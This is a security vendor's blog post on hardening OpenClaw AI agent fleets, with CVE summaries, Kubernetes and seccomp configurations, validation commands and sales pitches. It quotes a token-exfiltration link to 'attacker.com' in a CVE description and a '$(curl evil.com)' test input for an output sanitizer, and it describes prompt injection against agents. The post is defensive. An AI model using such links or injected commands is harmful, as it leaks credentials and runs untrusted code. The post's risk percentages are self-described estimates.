Platform

Solutions

Results

Insights

About

Book a Demo

Agent 07:Processing Q4 revenue forecast

← Back to Insights

SECURITY

NemoClaw: The 4-Tier Security Architecture Your Agent Fleet Needs Right Now

Liam McCarthy

Dispatched: Mar 2026

10 min read

135,000+ exposed OpenClaw instances. 36% of ClawHub skills flagged with security flaws. Three critical CVEs that let attackers steal tokens, escalate privileges, and escape sandboxes.

135K+

publicly exposed OpenClaw instances found by SecurityScorecard STRIKE team

February 2026 Shodan scan

Those numbers come from SecurityScorecard's STRIKE team (February 2026 Shodan scan), Snyk's ToxicSkills audit of 3,984 ClawHub skills, and OpenClaw's own security advisories. If you're running AI agents in production, these are your problems right now.

This post is a threat assessment disguised as a tutorial. We cover what's actually happening in the OpenClaw vulnerability landscape, why traditional container security doesn't address agentic workloads, and how to implement a 4-tier defense strategy using NemoClaw and standard Linux isolation primitives. Each tier includes deployable configuration, validation commands, and honest residual-risk estimates.

A note on NemoClaw: NVIDIA announced NemoClaw at GTC 2026 (March 16) as an open-source enterprise security layer for OpenClaw. It installs the NVIDIA OpenShell runtime in a single command, adding a kernel-level sandbox, an out-of-process policy engine, and a privacy router on top of OpenClaw. NemoClaw is currently in early-access preview – NVIDIA's own docs warn to "expect rough edges" and explicitly state it should not be used in production environments yet. The 4-tier architecture described here draws on NemoClaw's design principles but uses production-ready Linux primitives (network policies, seccomp, read-only filesystems) that you can deploy today regardless of NemoClaw's maturity.

The Vulnerability Landscape: What's Actually Being Exploited

Over the past 90 days, security researchers documented multiple critical CVEs affecting OpenClaw. The three with the highest impact:

CVE-2026-25253 (CVSS 8.8, authentication token exfiltration): The OpenClaw Control UI accepts a `gatewayUrl` GET parameter that overrides the WebSocket gateway URL. An attacker sends a crafted link (e.g., `https://victim-ui/?gatewayUrl=wss://attacker.com/exfil`). When clicked, the UI automatically connects to the attacker's WebSocket server and transmits the user's authentication token – no additional interaction required. Because OpenClaw's server does not validate the WebSocket Origin header, this bypasses localhost restrictions. The attacker then replays the stolen token to achieve remote code execution. Patched in OpenClaw v2026.1.29. (GitHub Advisory GHSA-g8p2-7wf7-98mq)

CVE-2026-32042 (CVSS 8.8, privilege escalation via unpaired device identity): OpenClaw versions 2026.2.22 through 2026.2.24 allow an attacker with valid shared gateway authentication to present a self-signed, unpaired device identity and self-assign elevated operator scopes – including `operator.admin` – before pairing approval is granted. This is a network-accessible privilege escalation requiring minimal attacker effort and no user interaction. Patched in OpenClaw v2026.2.25. (RedPacket Security advisory)

CVE-2026-32048 (CVSS 7.7, sandbox escape via session_spawn): OpenClaw versions prior to 2026.3.1 fail to enforce sandbox inheritance during cross-agent `sessions_spawn` operations. A sandboxed session can spawn child runtimes with `sandbox.mode` set to `off`, bypassing runtime confinement. This enables arbitrary code execution, data tampering, and denial of service within the service context. Classified under CWE-732 (Incorrect Permission Assignment for Critical Resource). Patched in OpenClaw v2026.3.1. (VulnCheck advisory)

Scale of exposure: SecurityScorecard's STRIKE team found 135,000+ publicly exposed OpenClaw instances in their February 2026 scan, with 15,000 of those vulnerable to remote code execution through CVE-2026-25253 alone. By March, that number had grown past 220,000 exposed instances according to the STRIKE team's live Declawed dashboard, which updates every 15 minutes. (SecurityScorecard blog)

Supply chain risk: Snyk's ToxicSkills study (February 2026) scanned 3,984 skills from ClawHub and skills.sh. Of those, 36.82% had at least one security flaw. The researchers identified 1,467 skills with security flaws, including 76 confirmed malicious payloads designed for credential theft, backdoor installation, and data exfiltration. Among confirmed malicious skills, 100% combined code-layer payloads with prompt injection – a dual-layer attack strategy that bypasses traditional static analysis. (Snyk ToxicSkills blog)

From Vulnerabilities to Architecture: Why Tiers Matter

The threat landscape above reveals a pattern: attacks against agentic systems operate across multiple layers simultaneously. CVE-2026-25253 exploits the network layer. CVE-2026-32048 exploits the process layer. The ToxicSkills dual-layer payloads combine code injection with prompt manipulation. No single defense covers all of these vectors, which is why the architecture below is organized into four independent tiers – each targeting a different point in the attack chain.

But before diving into the tiers, it's worth understanding why standard container security falls short even when correctly configured.

Why Traditional Container Security Isn't Enough for Agents

The gap between standard container hardening and agentic workload security comes down to trust assumptions. Traditional security (network isolation, capability dropping, seccomp) assumes the workload inside the container is trustworthy once deployed. AI agents break that assumption in three ways:

Post-deployment compromise: A skill from ClawHub can be updated or manipulated after you install it. Your container image scan passed at build time, but the runtime behavior changes.
Runtime manipulation: Prompt injection can alter agent behavior during execution. The model itself becomes an attack vector -- no code modification required.
Data source poisoning: External data sources (APIs, databases, MCP servers) can be compromised before the agent processes them, feeding malicious instructions through legitimate channels.

This is why a multi-tier approach matters. Each tier addresses a different point in the attack chain, and no single tier covers all three threat vectors.

The 4-Tier Defense Architecture

Each tier is independently deployable. Start with Tier 1 (highest impact-to-effort ratio) and add tiers incrementally.

Tier 1: Network Isolation

What it does: Agents run in network namespaces with explicit egress allowlists. No surprise outbound connections. This directly mitigates token exfiltration (CVE-2026-25253) and reduces lateral movement paths.

Setup:

Deploy two Kubernetes NetworkPolicy resources: first, a default-deny egress policy (podSelector: {}, egress: []) that blocks all outbound traffic from agent pods. Then, an allowlist policy that permits egress only to your API gateway on port 8443 and DNS (UDP 53) to kube-system. This ensures agents can only reach explicitly approved destinations.

Validation:

# From inside the agent pod, verify egress is blocked
kubectl exec -it <agent-pod> -- curl -s --max-time 5 \
  https://example.com && echo "FAIL" || echo "PASS"

# Verify allowed destination works
kubectl exec -it <agent-pod> -- curl -s --max-time 5 \
  https://api-gateway:8443/health && echo "PASS" || echo "FAIL"

# Verify DNS works
kubectl exec -it <agent-pod> -- nslookup api-gateway

Why this matters: CVE-2026-25253 relies on the agent UI connecting to an attacker-controlled WebSocket server. If your network policy blocks all egress except your API gateway, the exfiltration channel doesn't exist. Lateral movement (CVE-2026-32042) requires C2 egress – also blocked.

What this tier does NOT cover: Network isolation doesn't prevent privilege escalation within the cluster (CVE-2026-32042 if the attacker is already on the shared gateway), sandbox escape (CVE-2026-32048), prompt injection, or supply chain attacks. Those require Tiers 2-4.

Cost: ~2% CPU overhead for network namespace maintenance. No infrastructure changes beyond Kubernetes network policy support (Calico, Cilium, etc.).

Tier 2: Filesystem Isolation

What it does: Agents run with read-only root filesystem plus ephemeral writable directories. Supply chain attacks that depend on modifying agent code, configuration, or runtime libraries post-deployment are blocked.

Setup:

Run containers with --read-only flag and mount /tmp and /var/tmp as tmpfs with noexec,nosuid,nodev flags. In Kubernetes, set readOnlyRootFilesystem: true, allowPrivilegeEscalation: false, runAsNonRoot: true (uid 1000), and use emptyDir volumes backed by Memory with size limits (1Gi for /tmp, 500Mi for /var/tmp). This ensures persistent state is immutable while ephemeral writes still work.

Validation:

# Verify root filesystem is read-only
kubectl exec -it <agent-pod> -- touch /opt/agent/config.yaml \
  2>&1 | grep -q "Read-only" && echo "PASS" || echo "FAIL"

# Verify /tmp is writable but noexec
kubectl exec -it <agent-pod> -- sh -c \
  'cp /bin/ls /tmp/ls && /tmp/ls 2>&1 | grep -q \
  "Permission denied" && echo "PASS: noexec" || echo "FAIL"'

# Verify agent runs as non-root
kubectl exec -it <agent-pod> -- id | grep -q "uid=1000" \
  && echo "PASS" || echo "FAIL"

Why this matters: A malicious skill downloaded from ClawHub can't modify the Python/Node.js runtime, agent code, or configuration files. Compromised agents can write to /tmp (ephemeral, per-request), but persistent state is immutable.

Residual risk: Supply chain attacks at build time (compromised base images, poisoned dependencies baked into the image) are NOT caught by filesystem isolation. Pair with container image scanning (Trivy, Snyk Container) at your CI/CD layer.

Tier 3: Process Isolation (seccomp + capabilities)

What it does: Restricts the Linux syscalls available to the agent process. This is the primary mitigation for sandbox escape (CVE-2026-32048) – even if an agent spawns a child process, the child inherits the restricted syscall set.

Implementation:

The following seccomp profile is a minimal allowlist appropriate for a Node.js or Python agent container. Syscalls are grouped by functional category. Every syscall name below is a real Linux kernel syscall.

The seccomp profile uses SCMP_ACT_ERRNO as the default action (deny-by-default) and allowlists syscalls in seven functional groups: File I/O (open, read, write, stat, directory ops), Networking (socket, accept, connect, send/recv), Memory management (mmap, mprotect, brk), Process lifecycle (clone, execve, exit, wait), Event polling (epoll, poll, nanosleep, timers), Signals and threading (futex, kill, sigaction), and Process identity (getpid, getuid, uname, ioctl). The full JSON profile contains approximately 120 individual syscall names across these categories.

Why execve is in the allowlist: Node.js and Python runtimes require execve to start child processes (e.g., node spawning worker threads, pip during initialization, shell-out to git). Removing it breaks most agent runtimes at startup. The compensating controls that prevent execve abuse are: (1) the no_new_privs bit, set via allowPrivilegeEscalation: false in the pod security context, which ensures any execve'd process cannot gain privileges beyond its parent; (2) all capabilities are dropped (drop: ALL), so even if a process is executed, it has no elevated kernel capabilities; and (3) the read-only root filesystem (Tier 2) means there are no attacker-writable binaries to execute in the first place – /tmp is mounted noexec. If your agent runtime does not require execve (e.g., a single-binary Go agent), remove it from the allowlist for a tighter profile.

Save this as agent-seccomp.json and deploy:

# Copy seccomp profile to node
sudo cp agent-seccomp.json \
  /var/lib/kubelet/seccomp/agent-seccomp.json

# Apply pod with seccomp + dropped capabilities
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: agent
spec:
  securityContext:
    seccompProfile:
      type: Localhost
      localhostProfile: agent-seccomp.json
  containers:
  - name: agent
    image: agent:latest
    securityContext:
      allowPrivilegeEscalation: false
      capabilities:
        drop: ["ALL"]
EOF

Validation:

# Verify seccomp profile is loaded
kubectl get pod agent -o \
  jsonpath='{.spec.securityContext.seccompProfile}' | jq .

# Verify ptrace is blocked (used in escape techniques)
kubectl exec -it <agent-pod> -- python3 -c \
  "import ctypes; ctypes.CDLL(None).ptrace(0,0,0,0)" 2>&1 \
  | grep -q "Operation not permitted" && echo "PASS" || echo "FAIL"

# Verify agent still serves requests
kubectl exec -it <agent-pod> -- curl -s \
  http://localhost:8080/health && echo "PASS" || echo "FAIL"

# Check all capabilities are dropped
kubectl exec -it <agent-pod> -- cat /proc/1/status | grep CapEff
# Should show 0000000000000000

Why this matters: CVE-2026-32048 exploits sandbox inheritance failure in sessions_spawn. With this seccomp profile, even if an agent spawns a child process, the child inherits the restricted syscall allowlist. The syscalls needed for most escape techniques (ptrace, process_vm_writev, mount, unshare) are not in the allowlist and will return EPERM.

Residual risks this tier doesn't fully address:

Prompt injection (~40% residual, estimate based on the dual-layer attack patterns observed in Snyk's ToxicSkills data – prompt injection operates at the application layer, not the syscall layer).
MCP server vulnerabilities (~30% residual, estimate – external data sources accessed through MCP can be compromised upstream of the agent's process boundary).

These percentages are engineering estimates, not measured probabilities. They reflect the proportion of attack surface that remains after Tier 3 is deployed, based on the threat categories observed in the OpenClaw CVE corpus and Snyk's supply chain research.

Tier 4: Inference Isolation

What it does: Validates and sanitizes model outputs before they're used as executable instructions. Cryptographically signs skill instructions to detect tampering. This is the application-layer defense against prompt injection and memory poisoning.

Implementation:

The InferenceValidator class provides two layers of defense: Ed25519 signature verification for skill responses (a hard cryptographic boundary that detects any tampering) and regex-based output sanitization that blocks dangerous patterns like command substitution ($(...)), backtick execution, pipe chains, eval/exec calls, and OS/subprocess imports. The sanitizer is domain-aware—shell-domain skills bypass pattern checks since they legitimately use those constructs, while all other skill domains get filtered. Important caveat: the regex sanitizer is defense-in-depth, not a security boundary. Production deployments should layer it with AST-based analysis, sandboxed execution (Tier 3), and dedicated LLM output classifiers.

Validation:

# Verify dangerous patterns are blocked
python3 -c "
from inference_validator import InferenceValidator
v = InferenceValidator(test_public_key)
test = 'Run: \$(curl evil.com) and eval(payload)'
result = v.sanitize_output(test, 'search')
assert '\$(curl' not in result, 'FAIL: cmd sub not blocked'
assert 'eval(' not in result, 'FAIL: eval not blocked'
print('PASS: dangerous patterns blocked')
"

# Verify signature rejection
python3 -c "
from inference_validator import InferenceValidator
v = InferenceValidator(test_public_key)
assert not v.validate_skill_response('test', 'tampered', b'bad')
print('PASS: invalid signatures rejected')
"

Why this matters: Prompt injection and memory poisoning operate at the application layer – Tiers 1-3 can't see them. Output validation means even if a model is tricked into generating malicious instructions (via poisoned context, adversarial prompts, or compromised MCP data), those instructions are caught before execution.

Residual risk: Memory poisoning (~15% estimated residual) occurs when an agent's persistent context or fine-tuning data is corrupted. Tier 4 catches malicious outputs but can't detect subtle behavioral drift from poisoned training data. Defending against this requires monitoring and anomaly detection at the model evaluation layer, which is beyond runtime isolation.

Monitoring: Log all signature failures and pattern-match blocks to your SIEM. Set alerts for:

Any signature validation failure (indicates tampering or supply chain compromise)
Pattern blocks exceeding 5 per minute per agent (indicates active prompt injection attempt)
Output truncations (may indicate exfiltration attempts via oversized responses)

Integration Checklist

Each tier is independent. Deploy incrementally, validate at each step.

Tier 1: Network — 2 days — Mitigates token exfiltration (CVE-2026-25253) — Week 1 — Validate: curl to external IP returns timeout
Tier 2: Filesystem — 3 days — Mitigates supply chain code modification — Week 1 — Validate: touch /opt/agent/config.yaml returns EROFS
Tier 3: Process — 1 week — Mitigates sandbox escape (CVE-2026-32048) — Week 2-3 — Validate: ptrace returns EPERM, agent health check passes
Tier 4: Inference — 2 weeks — Mitigates prompt injection, output-based attacks — Week 3-4 — Validate: signature rejection test passes, pattern blocks logged

Want help mapping this to your stack? If you're running OpenClaw agents in production and want a prioritized deployment plan for your specific infrastructure, book a 30-minute assessment with Reality AI. We'll walk through your topology, identify the highest-risk gaps, and give you a concrete week-by-week rollout. No pitch deck – just architecture.

The Business Case

IBM's Cost of a Data Breach Report 2024 (published July 2024) found the global average cost of a data breach reached $4.88 million – a 10% year-over-year increase. The subsequent 2025 report (published July 2025) showed a decline to $4.44 million, driven by faster breach containment through AI-assisted detection. (IBM 2024 report; IBM 2025 report)

For organizations running AI agent fleets with the vulnerabilities described above, the exposure is real: 15,000 of the 135,000 exposed OpenClaw instances were directly exploitable for RCE.

Here's a simplified risk-reduction model using IBM's $4.88M figure (the higher, pre-AI-defense baseline) as the starting point:

After Tier 1 (2 days): Token exfiltration and C2 egress channels closed. This addresses the highest-probability remote attack vectors. Estimated risk reduction: ~50-60%.
After Tiers 1-3 (2 weeks): Privilege escalation, supply chain modification, and sandbox escape all mitigated at the OS level. Estimated risk reduction: ~80-85%.
After all 4 Tiers (4 weeks): Application-layer defenses added. Residual risk limited to training-data poisoning and novel 0-day kernel exploits. Estimated risk reduction: ~90%.

These are directional estimates, not actuarial calculations. Your actual risk profile depends on your deployment topology, data sensitivity, and threat model. The point: the engineering cost of 4 weeks is small relative to even a fractional probability of a $4.88M breach event.

What to Do This Week

Audit your OpenClaw version against CVE-2026-25253, CVE-2026-32042, and CVE-2026-32048. If you're running anything before v2026.3.1, patch immediately. Use openclaw --version or check your container image tag.
Deploy Tier 1 today: Network policies are the highest-ROI control. Apply the default-deny egress policy, allowlist your API gateway, and validate with the curl test above.
Plan Tiers 2-3 for next sprint: Read-only filesystem + seccomp. The seccomp profile above is ready to deploy -- test it in staging first and watch for syscall denials in dmesg or auditd logs.
Brief your security/compliance team: They'll want Tier 4 (signature verification, output sanitization) documented before you scale agent deployments. Give them this post as a starting point.
Track NemoClaw's progress: NVIDIA's early-access preview adds the OpenShell kernel-level sandbox, policy engine, and privacy router on top of what's described here. When it reaches production readiness, it will simplify Tiers 1-3 into a single deployment. Follow the NemoClaw GitHub repo and NVIDIA's developer docs for updates.

Need help implementing this for your stack? Reality AI offers hands-on deployment support for enterprise AI security architectures, from agent fleet hardening to compliance documentation. Get in touch to discuss your specific environment, or book a 30-minute assessment to prioritize your deployment roadmap.

This architecture is based on NemoClaw's design principles (announced at NVIDIA GTC 2026, currently in early-access preview) combined with production-tested Linux isolation primitives. Residual risk percentages are engineering estimates based on observed attack patterns in the OpenClaw CVE corpus and Snyk's ToxicSkills research -- they are not statistical guarantees. Every CVE description, CVSS score, and external statistic in this post links to its primary source.

Key Takeaway

Deploy Tier 1 (network isolation) today – it takes 2 days and closes the highest-probability attack vectors. Then layer Tiers 2-4 over the next 4 weeks for defense-in-depth.

Liam McCarthy

Founder & CEO

Co-founder of Reality AI and architect of the ADAS-Evolved framework. Specializes in NemoClaw deployment, multi-tier agent security, and enterprise-grade autonomous system hardening.